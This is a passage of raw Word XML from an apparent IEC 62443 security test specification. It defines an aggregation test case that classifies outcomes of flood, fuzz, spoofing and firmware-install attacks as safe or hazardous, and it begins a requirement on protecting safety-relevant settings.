              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="385A197E" w14:textId="6FDCB460" w:rsidR="00F207B7" w:rsidRPr="006D5B99" w:rsidRDefault="00F207B7" w:rsidP="00F207B7">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="236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the safety path remains unaffected by the web-interface flood (confirms domain separation / black-channel architecture).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="14FEB110" w14:textId="77777777" w:rsidR="00DA6C1D" w:rsidRPr="006D5B99" w:rsidRDefault="00DA6C1D" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43E6D46A" w14:textId="77777777" w:rsidR="00DA6C1D" w:rsidRPr="006D5B99" w:rsidRDefault="00DA6C1D" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DD993B4" w14:textId="4C551F85" w:rsidR="00AE2023" w:rsidRPr="006D5B99" w:rsidRDefault="00E33E4C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TC-RQ010-05 - Outcome-Verification Aggregation Harness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352701A1" w14:textId="77777777" w:rsidR="00AE2023" w:rsidRPr="006D5B99" w:rsidRDefault="00AE2023" w:rsidP="00AE2023">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6D5B99"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6D5B99" w:rsidRDefault="00AE2023" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="384C425B"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6D5B99" w:rsidRDefault="00AE2023" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="20D678D5" w14:textId="3D4577E0" w:rsidR="00AE2023" w:rsidRPr="006D5B99"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RQ-010 </w:t>
            </w:r>
            <w:r w:rsidR="002F6A54" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidR="002F6A54" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t xml:space="preserve">CR 3.6 </w:t>
            </w:r>
            <w:r w:rsidR="002F6A54" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset A, Asset E</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE2023" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00AE2023" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="349B0DCF" w14:textId="53D4761D" w:rsidR="00AE2023" w:rsidRPr="006D5B99"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N/A, aggregate outcome check across all classes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE2023" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00AE2023" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A97F19B" w14:textId="18C42BF3" w:rsidR="00AE2023" w:rsidRPr="006D5B99"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AE2023" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00AE2023" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C7AD4EE" w14:textId="614652C3" w:rsidR="00AE2023" w:rsidRPr="006D5B99"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For every attack, the RQ-010-owned flood (TC-</w:t>
            </w:r>
            <w:r w:rsidR="00993C27" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>RQ</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>010-</w:t>
            </w:r>
            <w:r w:rsidR="00993C27" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>02</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>) and fuzz (TC-</w:t>
            </w:r>
            <w:r w:rsidR="00993C27" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>RQ</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>010-</w:t>
            </w:r>
            <w:r w:rsidR="00993C27" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>03</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>), plus the connecting-device spoofing (TC-</w:t>
            </w:r>
            <w:r w:rsidR="00B82652" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>RQ</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>001-</w:t>
            </w:r>
            <w:r w:rsidR="00B82652" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidR="00F70742" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="00B82652" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidR="00F70742" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>) and unsigned-firmware install (TC-</w:t>
            </w:r>
            <w:r w:rsidR="0022010B" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>RQ</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>005-</w:t>
            </w:r>
            <w:r w:rsidR="0022010B" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>03</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">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6D5B99"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6D5B99" w:rsidRDefault="00AE2023" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D0B5822"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Provide independent readback of the safe outputs.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6740F56E"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For each attack case (owned + cross-referenced), sample output state and qualifier.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42145826" w14:textId="77777777" w:rsidR="00E23E40"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Classify each outcome as {safe-continue, safe-passivate, hazardous}.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BABCD5D" w14:textId="218685D2" w:rsidR="00AE2023" w:rsidRPr="006D5B99"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Consolidate into an outcome matrix; flag any hazardous result.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE2023" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00AE2023" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="559B5BC6" w14:textId="77777777" w:rsidR="00E23E4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(RQ-010 met for that class) if every outcome is safe-continue or safe-passivate. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0597061E" w14:textId="77777777" w:rsidR="00EC16E0"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FAIL if any yields uncommanded/unsafe actuation. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3246EEAB" w14:textId="571617AC" w:rsidR="00AE2023" w:rsidRPr="006D5B99"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flood/fuzz/spoofing classes PASS (black channel + CR 3.6); the firmware-install class is the documented exception that can lead to hazard.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="14AB8305" w14:textId="77777777" w:rsidR="00AE2023" w:rsidRPr="006D5B99" w:rsidRDefault="00AE2023" w:rsidP="00AE2023">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12CE18E8" w14:textId="77777777" w:rsidR="00AE2023" w:rsidRPr="006D5B99" w:rsidRDefault="00AE2023" w:rsidP="00AE2023">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6D5B99"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6D5B99" w:rsidRDefault="00AE2023" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BCBA970" w14:textId="77777777" w:rsidR="00AE2023" w:rsidRPr="006D5B99"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E2023" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00AE2023" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45898732" w14:textId="2DC68D7C" w:rsidR="00AE2023" w:rsidRPr="006D5B99"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TC-RQ010-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB5350" w:rsidRPr="006D5B99"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DB5350" w:rsidRPr="006D5B99" w:rsidRDefault="00DB5350" w:rsidP="00DB5350">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5224902B" w14:textId="2C93C345"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evaluation/aggregation task</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB5350" w:rsidRPr="006D5B99"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DB5350" w:rsidRPr="006D5B99" w:rsidRDefault="00DB5350" w:rsidP="00DB5350">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="684CE20E" w14:textId="126351A8" w:rsidR="00DB5350" w:rsidRPr="006D5B99" w:rsidRDefault="00DB5350" w:rsidP="00DB5350">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Spreadsheet/test-management tool for consolidation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB5350" w:rsidRPr="006D5B99"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DB5350" w:rsidRPr="006D5B99" w:rsidRDefault="00DB5350" w:rsidP="00DB5350">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07406171"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For each referenced test case, take the outcome (qualifier, outputs)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BE6E37F"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from its respective test log.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73B268DC"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Classify each into an outcome matrix {safe-continue, safe-passivate,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E6DA514" w14:textId="77777777" w:rsidR="00DB5350" w:rsidRPr="006D5B99" w:rsidRDefault="00DB5350" w:rsidP="00DB535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hazardous}.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21F35495" w14:textId="6F62AC21" w:rsidR="00DB5350" w:rsidRPr="006D5B99" w:rsidRDefault="00DB5350" w:rsidP="00DB535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Flag any hazardous result for follow-up.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB5350" w:rsidRPr="006D5B99"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421BAA97" w:rsidR="00DB5350" w:rsidRPr="006D5B99" w:rsidRDefault="00DB5350" w:rsidP="00DB5350">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D976E97" w14:textId="18CE652B" w:rsidR="00DB5350" w:rsidRPr="006D5B99" w:rsidRDefault="00DB5350" w:rsidP="00DB535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w:t>
            </w:r>
            <w:r w:rsidR="00CA0401" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> flood/fuzzing/spoofing classes result in safe-continue/safe-passivate; the firmware-installation class (TC-RQ005-03) remains the documented exception.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2D18BF30" w14:textId="77777777" w:rsidR="00AE2023" w:rsidRPr="006D5B99" w:rsidRDefault="00AE2023" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77AF00DD" w14:textId="77777777" w:rsidR="00A97116" w:rsidRPr="006D5B99" w:rsidRDefault="00A97116" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B433B31" w14:textId="77777777" w:rsidR="00A97116" w:rsidRPr="006D5B99" w:rsidRDefault="00A97116" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="633B8151" w14:textId="77777777" w:rsidR="00A97116" w:rsidRPr="006D5B99" w:rsidRDefault="00A97116" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41DEBB28" w14:textId="77777777" w:rsidR="00A97116" w:rsidRPr="006D5B99" w:rsidRDefault="00A97116" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A329656" w14:textId="77777777" w:rsidR="00A97116" w:rsidRPr="006D5B99" w:rsidRDefault="00A97116" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D853CEA" w14:textId="77777777" w:rsidR="00A97116" w:rsidRPr="006D5B99" w:rsidRDefault="00A97116" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AC00BF9" w14:textId="77777777" w:rsidR="00A97116" w:rsidRPr="006D5B99" w:rsidRDefault="00A97116" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2231147A" w14:textId="77777777" w:rsidR="00E93453" w:rsidRPr="006D5B99" w:rsidRDefault="00E93453" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11066F3F" w14:textId="77777777" w:rsidR="00E93453" w:rsidRPr="006D5B99" w:rsidRDefault="00E93453" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D01DF7D" w14:textId="77777777" w:rsidR="00E93453" w:rsidRPr="006D5B99" w:rsidRDefault="00E93453" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E5B65D6" w14:textId="77777777" w:rsidR="00E93453" w:rsidRPr="006D5B99" w:rsidRDefault="00E93453" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70114D24" w14:textId="77777777" w:rsidR="00E93453" w:rsidRPr="006D5B99" w:rsidRDefault="00E93453" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A326C46" w14:textId="77777777" w:rsidR="00A97116" w:rsidRPr="006D5B99" w:rsidRDefault="00A97116" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D390BC2" w14:textId="77777777" w:rsidR="0033231D" w:rsidRPr="006D5B99" w:rsidRDefault="0033231D" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33B02BDC" w14:textId="19E78447" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>REQUIREMENT 11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088F6ED1"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5B4AA0EF" w14:textId="0F7AFCE2" w:rsidR="00DB1578" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MVO-ID: </w:t>
      </w:r>
      <w:r w:rsidR="00DB1578" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RQ-011</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590CD514" w14:textId="4205C033" w:rsidR="00DB1578" w:rsidRPr="006D5B99" w:rsidRDefault="00DB1578" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVO Requirement Text:</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> The system shall prevent modifications to safety-relevant settings or rules, including those generated during a learning phase, where such modifications could lead to a hazardous situation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C573B74" w14:textId="77B5FBE2" w:rsidR="00DB1578" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">IEC 62443-4-2 CR </w:t>
      </w:r>
      <w:r w:rsidR="001D4045" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mapping</w:t>
      </w:r>
      <w:r w:rsidR="0031609F" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DB1578" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
